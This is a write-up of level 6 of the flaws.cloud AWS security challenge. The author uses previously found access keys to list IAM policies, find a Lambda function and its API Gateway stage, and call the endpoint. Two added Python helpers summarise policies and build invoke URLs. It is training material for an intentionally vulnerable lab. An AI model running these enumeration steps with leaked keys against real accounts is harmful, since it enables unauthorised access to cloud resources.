# Level 6

<figure><img src="/files/MNbRo42T9aUTFNu24nKu" alt=""><figcaption></figcaption></figure>

## Enumerating Access Keys

In the previous level, we were provided with AWS access keys. Let's figure out who they're for and enumerate our access.

{% code overflow="wrap" %}

```bash
aws --profile flaws6 sts get-caller-identity

{
    "UserId": "AIDAIRMDOSCWGLCDWOG6A",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/Level6"
}
```

{% endcode %}

This time we can actually view our permissions!

{% code overflow="wrap" %}

```bash
aws --profile flaws6 iam list-attached-user-policies --user-name Level6

{
    "AttachedPolicies": [
        {
            "PolicyName": "MySecurityAudit",
            "PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
        },
        {
            "PolicyName": "list_apigateways",
            "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
        }
    ]
}
```

{% endcode %}

The policies are pretty large, so I won't paste them here, but these commands will let you pull each policy's document (list the versions first, then fetch the one marked as the default version).

{% code overflow="wrap" %}

```bash
aws --profile flaws6 iam list-policy-versions --policy-arn <policy-arn>

aws --profile flaws6 iam get-policy-version --policy-arn <policy-arn> --version-id <policy-version>
```

{% endcode %}
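The same enumeration in a small script, as an added example that is not part of the original post. The pure helpers flatten any IAM policy document into one row per action/resource pair so the allowed actions can be scanned at a glance; the `boto3` functions do the same calls as the CLI commands above (`list-attached-user-policies`, `get-policy` for the default version id, `get-policy-version`) plus the inline policies the attached-policy listing does not show. The profile name `flaws6` comes from the page; `SAMPLE_DOCUMENT` is a constructed policy, not the real `MySecurityAudit` or `list_apigateways` policy.

```python
"""Summarise what the managed and inline policies on an IAM user allow.

Added example for the Level 6 walkthrough; not the author's code. The
boto3 calls need a configured profile; the helpers below do not.
"""
from __future__ import annotations

from typing import Any


def as_list(value: Any) -> list:
    """Action, Resource, NotAction and NotResource may be a string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def summarize_policy(document: dict) -> list[dict]:
    """Flatten a policy document into {effect, action, resource, condition} rows.

    NotAction/NotResource are kept with a prefix so a statement that allows
    everything *except* a few actions is not silently dropped from the list.
    """
    rows = []
    for stmt in as_list(document.get("Statement")):
        effect = stmt.get("Effect", "Deny")
        actions = as_list(stmt.get("Action")) or [
            f"NotAction:{a}" for a in as_list(stmt.get("NotAction"))
        ]
        resources = as_list(stmt.get("Resource")) or [
            f"NotResource:{r}" for r in as_list(stmt.get("NotResource"))
        ]
        for action in actions:
            for resource in resources:
                rows.append({"effect": effect, "action": action,
                             "resource": resource, "condition": stmt.get("Condition")})
    return rows


def allowed_actions(rows: list[dict], prefix: str = "") -> list[str]:
    """Allow-effect actions, optionally filtered by service prefix such as 'apigateway:'."""
    return [r["action"] for r in rows
            if r["effect"] == "Allow" and r["action"].startswith(prefix)]


def enumerate_user_policies(profile: str, user_name: str) -> dict[str, list[dict]]:
    """Fetch and summarise every managed and inline policy on `user_name`."""
    import boto3  # imported here so the pure helpers above work without it

    iam = boto3.Session(profile_name=profile).client("iam")
    result: dict[str, list[dict]] = {}
    # Managed policies: equivalent to list-attached-user-policies + get-policy-version.
    for attached in iam.list_attached_user_policies(UserName=user_name)["AttachedPolicies"]:
        arn = attached["PolicyArn"]
        version_id = iam.get_policy(PolicyArn=arn)["Policy"]["DefaultVersionId"]
        doc = iam.get_policy_version(PolicyArn=arn, VersionId=version_id)["PolicyVersion"]["Document"]
        result[attached["PolicyName"]] = summarize_policy(doc)
    # Inline policies are not returned by list-attached-user-policies; check them too.
    for name in iam.list_user_policies(UserName=user_name)["PolicyNames"]:
        doc = iam.get_user_policy(UserName=user_name, PolicyName=name)["PolicyDocument"]
        result[f"inline:{name}"] = summarize_policy(doc)
    return result


# Constructed sample document; shaped like a real policy, not the challenge's own.
SAMPLE_DOCUMENT = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "apigateway:GET",
         "Resource": "arn:aws:apigateway:us-west-2::/restapis/*"},
        {"Effect": "Deny", "NotAction": "s3:ListBucket", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for row in summarize_policy(SAMPLE_DOCUMENT):
        print(f"{row['effect']:<5} {row['action']:<28} {row['resource']}")
    # Against a real account (profile name from the walkthrough):
    # for name, rows in enumerate_user_policies("flaws6", "Level6").items():
    #     print(name, allowed_actions(rows, "apigateway:"))
```

Scanning the flattened rows for `apigateway:` and `lambda:` actions is what points at the next step in this level; the inline-policy loop is there because a user whose attached policies look harmless can still carry an inline one that is not.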

## Enumerating Access with cloudfox

I ended up running cloudfox again with this new profile.

```bash
cloudfox aws -p flaws6 all-checks
```

After going through the output, I discovered a service role called `Level6` with the managed policy `AWSLambdaBasicExecutionRole` attached, though only the Lambda service was allowed to assume this role.

That was my hint: we probably need to trigger a Lambda function that runs as the Level6 role, and it will likely hand us the next clue.

## Enumerating Lambda

We can enumerate Lambda functions like this:

{% code overflow="wrap" %}

```bash
aws --profile flaws6 lambda list-functions 

{
    "Functions": [
        {
            "FunctionName": "Level6",
            "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
[snip]
```

{% endcode %}

There's only one function and it's called `Level6`.

If we view the function's resource policy, we can see that the API Gateway service is allowed to invoke this function, and the `SourceArn` condition tells us exactly which API, method and path it is wired to.

{% code overflow="wrap" %}

```bash
aws --profile flaws6 lambda get-policy --function-name Level6 | jq -r '.Policy' | jq

{
  "Version": "2012-10-17",
  "Id": "default",
  "Statement": [
    {
      "Sid": "904610a93f593b76ad66ed6ed82c0a8b",
      "Effect": "Allow",
      "Principal": {
        "Service": "apigateway.amazonaws.com"
      },
      "Action": "lambda:InvokeFunction",
      "Resource": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
      "Condition": {
        "ArnLike": {
          "AWS:SourceArn": "arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"
[snip]
```

{% endcode %}

So we need to put together the URL of the API we have to call. The format looks like this:

{% code overflow="wrap" %}

```bash
https://<rest-api-id>.execute-api.<region>.amazonaws.com/<api-stage-name>/<function-name>
```

{% endcode %}

From the enumeration so far we have every piece except the stage name (the REST API ID `s33ppypa75` and the region `us-west-2` both come from the `AWS:SourceArn` condition in the Lambda policy), and we can discover the stage like so:

```bash
aws --profile flaws6 apigateway get-stages --rest-api-id "s33ppypa75"

{
    "item": [
        {
            "deploymentId": "8gppiv",
            "stageName": "Prod",
            "cacheClusterEnabled": false,
[snip]
```
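The derivation from the Lambda resource policy to the invoke URL, as an added example that is not part of the original post. It parses the `execute-api` ARN from the `AWS:SourceArn` condition, splits it into region, account, API ID, stage, method and path, and builds the URL in the format shown above; because the stage in the `SourceArn` is a wildcard, a concrete stage (from `get-stages`) has to be supplied. The policy JSON embedded below is trimmed from the `get-policy` output on this page; the profile name `flaws6` and the function name `Level6` come from the page as well. The `boto3` helpers reproduce the two CLI calls and are only needed against a real account.

```python
"""From a Lambda resource policy to the API Gateway URL that triggers it.

Added example for the Level 6 walkthrough; not the author's code.
"""
from __future__ import annotations

import json
from dataclasses import dataclass


@dataclass
class ExecuteApiArn:
    region: str
    account: str
    api_id: str
    stage: str     # often "*" in a SourceArn condition
    method: str    # HTTP method, e.g. GET
    path: str      # resource path without leading slash


def parse_execute_api_arn(arn: str) -> ExecuteApiArn:
    """Split arn:<partition>:execute-api:<region>:<account>:<api-id>/<stage>/<METHOD>/<path>."""
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn" or parts[2] != "execute-api":
        raise ValueError(f"not an execute-api ARN: {arn}")
    _, _, _, region, account, resource = parts
    segments = resource.split("/", 3)
    if len(segments) != 4:
        raise ValueError(f"execute-api resource is not <api-id>/<stage>/<METHOD>/<path>: {resource}")
    api_id, stage, method, path = segments
    return ExecuteApiArn(region, account, api_id, stage, method, path)


def apigateway_source_arns(policy: dict) -> list[str]:
    """Every SourceArn from which the API Gateway service is allowed to invoke the function."""
    found: list[str] = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        services = principal.get("Service", []) if isinstance(principal, dict) else []
        services = services if isinstance(services, list) else [services]
        if "apigateway.amazonaws.com" not in services:
            continue
        for op, keys in stmt.get("Condition", {}).items():
            if op not in ("ArnLike", "ArnEquals"):
                continue
            for key, value in keys.items():
                if key.lower() == "aws:sourcearn":  # condition keys are case-insensitive
                    found.extend(value if isinstance(value, list) else [value])
    return found


def needs_stage_lookup(arn: ExecuteApiArn) -> bool:
    """True when the policy only names a wildcard stage, so get-stages is required."""
    return arn.stage == "*"


def invoke_url(arn: ExecuteApiArn, stage: str | None = None) -> str:
    """https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stage>/<path>"""
    chosen = stage or arn.stage
    if chosen == "*":
        raise ValueError("stage is a wildcard; look it up with `apigateway get-stages`")
    return f"https://{arn.api_id}.execute-api.{arn.region}.amazonaws.com/{chosen}/{arn.path}"


def fetch_lambda_policy(profile: str, function_name: str) -> dict:
    """lambda get-policy returns the policy as a JSON string inside the response."""
    import boto3
    client = boto3.Session(profile_name=profile).client("lambda")
    return json.loads(client.get_policy(FunctionName=function_name)["Policy"])


def stage_names(profile: str, api_id: str, region: str) -> list[str]:
    """apigateway get-stages for the REST API the SourceArn points at."""
    import boto3
    client = boto3.Session(profile_name=profile, region_name=region).client("apigateway")
    return [item["stageName"] for item in client.get_stages(restApiId=api_id)["item"]]


# Trimmed from the get-policy output shown on this page.
LEVEL6_POLICY = {
    "Version": "2012-10-17",
    "Id": "default",
    "Statement": [{
        "Sid": "904610a93f593b76ad66ed6ed82c0a8b",
        "Effect": "Allow",
        "Principal": {"Service": "apigateway.amazonaws.com"},
        "Action": "lambda:InvokeFunction",
        "Resource": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
        "Condition": {"ArnLike": {
            "AWS:SourceArn": "arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"}},
    }],
}

if __name__ == "__main__":
    for src in apigateway_source_arns(LEVEL6_POLICY):
        parsed = parse_execute_api_arn(src)
        stage = "Prod" if needs_stage_lookup(parsed) else parsed.stage  # "Prod" from get-stages above
        print(parsed.method, invoke_url(parsed, stage))
```

The same walk over `apigateway_source_arns` is a useful audit on your own account: any function whose resource policy trusts `apigateway.amazonaws.com` without a `SourceArn` condition, or with a wildcard API ID in it, can be invoked from any API in the account rather than the one you intended.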

## Triggering the API

With all the required information discovered, we can trigger the API.

{% code overflow="wrap" %}

```bash
curl https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

"Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"
```

{% endcode %}

Navigating to the website, we discover the end of the challenge!

<figure><img src="/files/jAhdLLXv1n0xxuFOAlvF" alt=""><figcaption></figcaption></figure>

## Wrap-Up

In Level 6, we enumerated our access with the access keys discovered in the previous level. That enumeration surfaced a Lambda function, the API Gateway endpoint allowed to invoke it, and its stage name; calling that endpoint returned the URL for the end of the challenge.
